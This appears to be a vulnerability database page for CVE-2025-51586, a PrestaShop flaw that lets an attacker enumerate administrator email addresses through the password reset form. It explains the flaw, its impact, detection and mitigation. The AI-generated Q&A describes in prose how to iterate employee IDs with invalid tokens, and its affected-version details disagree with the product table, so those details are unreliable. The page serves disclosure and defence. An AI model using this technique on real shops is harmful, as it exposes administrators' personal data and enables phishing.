CVE-2025-51586
BaseFortify
Publication date: 2025-09-08
Last updated on: 2025-09-12
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| prestashop | prestashop | to 8.2.1 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-359 | The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-51586 is a user enumeration vulnerability in PrestaShop's AdminLogin controller affecting versions 1.7 through 8.2.2. Attackers can manipulate the `id_employee` and `reset_token` parameters on the Back Office password reset form to obtain administrator email addresses. When an invalid reset token is supplied with a valid employee ID, the system still displays the password reset form and includes the employee's email in a hidden field, allowing attackers to systematically enumerate admin emails by iterating employee IDs. The root cause is that the reset form variables are assigned without verifying the validity of the reset token for the employee. [1]
How can this vulnerability impact me? :
This vulnerability can allow remote attackers to gain sensitive information, specifically administrator email addresses, without any privileges or user interaction. Knowing these email addresses can facilitate targeted attacks such as phishing or brute force attempts against administrator accounts. Although the vulnerability does not directly allow account takeover, it exposes private information that can be leveraged in further attacks. The attack has high complexity and cannot be reliably blocked by common WAF rules. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability exposes sensitive personal information (administrator email addresses) without proper authorization, which could be considered a violation of data protection principles under regulations like GDPR and HIPAA. Unauthorized disclosure of personal data may lead to non-compliance with these standards, potentially resulting in legal and regulatory consequences. Therefore, this vulnerability negatively impacts compliance with common data protection regulations. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to enumerate administrator email addresses via the Back Office password reset form. An attacker can send requests to the reset password endpoint manipulating the `id_employee` and `reset_token` parameters. Specifically, by supplying a valid `id_employee` with an invalid `reset_token`, the response includes the administrator's email address in a hidden field. To detect this on your system, you can monitor HTTP requests to the Back Office password reset URL for unusual or repeated attempts with varying `id_employee` values. There are no specific commands provided, but you could use tools like curl or Burp Suite to manually test the endpoint by iterating `id_employee` values with invalid tokens and inspecting the response for email disclosure. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1) Enforce rate limiting on the password reset endpoint to reduce the feasibility of enumeration attacks. 2) Enable two-factor authentication (2FA) for Back Office login to add an additional security layer. 3) Keep the Back Office URL secret and rotate it if it has been leaked. 4) Update PrestaShop to version 8.2.3 or later, where the vulnerability is fixed by verifying the reset token before rendering the reset form and email field. Note that common WAF rules are not reliable against this vulnerability as it stems from application logic. [1]